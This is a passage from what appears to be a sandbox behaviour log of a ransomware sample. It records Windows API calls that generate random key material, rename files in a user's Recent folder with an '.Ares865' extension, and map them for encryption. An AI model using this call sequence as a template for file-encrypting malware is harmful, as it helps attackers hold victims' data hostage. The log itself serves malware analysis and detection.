lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2637) returned 1 [0093.246] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.246] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.247] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd50, lpName=0x0) returned 0x15c [0093.247] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd50) returned 0x190000 [0093.247] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.248] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.248] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.249] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GnIn7LHmt.lnk.Ares865") returned 58 [0093.249] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GnIn7LHmt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gnin7lhmt.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GnIn7LHmt.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gnin7lhmt.lnk.ares865"), dwFlags=0x1) returned 1 [0093.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GnIn7LHmt.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gnin7lhmt.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.250] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6679) returned 1 [0093.251] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.252] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d20, lpName=0x0) returned 0x15c [0093.252] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d20) returned 0x190000 [0093.252] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.253] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.254] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gP-zZnWV.lnk.Ares865") returned 57 [0093.254] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gP-zZnWV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gp-zznwv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gP-zZnWV.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gp-zznwv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gP-zZnWV.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gp-zznwv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.255] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5067) returned 1 [0093.256] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.257] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16d0, lpName=0x0) returned 0x15c [0093.257] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d0) returned 0x190000 [0093.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.259] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gt6UxC0 cf08HWexfjZS.lnk.Ares865") returned 69 [0093.260] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gt6UxC0 cf08HWexfjZS.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gt6uxc0 cf08hwexfjzs.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gt6UxC0 cf08HWexfjZS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gt6uxc0 cf08hwexfjzs.lnk.ares865"), dwFlags=0x1) returned 1 [0093.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\gt6UxC0 cf08HWexfjZS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gt6uxc0 cf08hwexfjzs.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.261] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6787) returned 1 [0093.261] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.262] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.262] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.262] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.263] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.265] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GyZ42O_.lnk.Ares865") returned 56 [0093.265] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GyZ42O_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gyz42o_.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GyZ42O_.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gyz42o_.lnk.ares865"), dwFlags=0x1) returned 1 [0093.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\GyZ42O_.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\gyz42o_.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.266] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=749) returned 1 [0093.266] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.267] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.267] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.268] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.268] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.272] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\h7uHzWw.lnk.Ares865") returned 56 [0093.272] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\h7uHzWw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\h7uhzww.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\h7uHzWw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\h7uhzww.lnk.ares865"), dwFlags=0x1) returned 1 [0093.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\h7uHzWw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\h7uhzww.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.284] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3696) returned 1 [0093.284] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.285] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.285] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.286] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.286] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.286] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.288] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\HB5VAen9TXxy0d-v.lnk.Ares865") returned 65 [0093.288] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\HB5VAen9TXxy0d-v.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\hb5vaen9txxy0d-v.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\HB5VAen9TXxy0d-v.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\hb5vaen9txxy0d-v.lnk.ares865"), dwFlags=0x1) returned 1 [0093.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\HB5VAen9TXxy0d-v.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\hb5vaen9txxy0d-v.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.289] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6764) returned 1 [0093.289] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.290] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.290] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.291] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.291] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.291] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.293] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\I-TxZlgyjy.lnk.Ares865") returned 59 [0093.293] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\I-TxZlgyjy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\i-txzlgyjy.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\I-TxZlgyjy.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\i-txzlgyjy.lnk.ares865"), dwFlags=0x1) returned 1 [0093.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\I-TxZlgyjy.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\i-txzlgyjy.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.294] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5060) returned 1 [0093.294] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.295] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.295] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.296] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.296] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.296] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.298] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ib41cD3kAfbZSJslTzl.lnk.Ares865") returned 68 [0093.298] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ib41cD3kAfbZSJslTzl.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ib41cd3kafbzsjsltzl.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ib41cD3kAfbZSJslTzl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ib41cd3kafbzsjsltzl.lnk.ares865"), dwFlags=0x1) returned 1 [0093.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\ib41cD3kAfbZSJslTzl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\ib41cd3kafbzsjsltzl.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.299] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5021) returned 1 [0093.299] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.300] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.301] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.301] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IncK3x9u8pb-Q.mkv.lnk.Ares865") returned 66 [0093.302] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IncK3x9u8pb-Q.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\inck3x9u8pb-q.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IncK3x9u8pb-Q.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\inck3x9u8pb-q.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IncK3x9u8pb-Q.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\inck3x9u8pb-q.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2553) returned 1 [0093.304] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.305] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.305] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.305] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.306] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.306] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IUIaXsECWBnwr_3ongH.flv.lnk.Ares865") returned 72 [0093.307] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IUIaXsECWBnwr_3ongH.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\iuiaxsecwbnwr_3ongh.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IUIaXsECWBnwr_3ongH.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\iuiaxsecwbnwr_3ongh.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IUIaXsECWBnwr_3ongH.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\iuiaxsecwbnwr_3ongh.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.308] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6801) returned 1 [0093.309] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.309] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.309] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.310] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.311] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.311] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.312] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IzTDkQ_vniMDC8Il.lnk.Ares865") returned 65 [0093.312] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IzTDkQ_vniMDC8Il.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\iztdkq_vnimdc8il.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IzTDkQ_vniMDC8Il.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\iztdkq_vnimdc8il.lnk.ares865"), dwFlags=0x1) returned 1 [0093.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\IzTDkQ_vniMDC8Il.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\iztdkq_vnimdc8il.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3837) returned 1 [0093.314] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.314] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.315] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.316] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.316] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.317] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\j521.ots.lnk.Ares865") returned 57 [0093.317] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\j521.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\j521.ots.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\j521.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\j521.ots.lnk.ares865"), dwFlags=0x1) returned 1 [0093.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\j521.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\j521.ots.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.319] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6627) returned 1 [0093.319] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.320] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.320] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.320] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.322] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.322] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.323] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JM FgGlsj.lnk.Ares865") returned 58 [0093.323] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JM FgGlsj.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\jm fgglsj.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JM FgGlsj.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\jm fgglsj.lnk.ares865"), dwFlags=0x1) returned 1 [0093.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JM FgGlsj.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\jm fgglsj.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.325] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8379) returned 1 [0093.325] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.325] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.325] 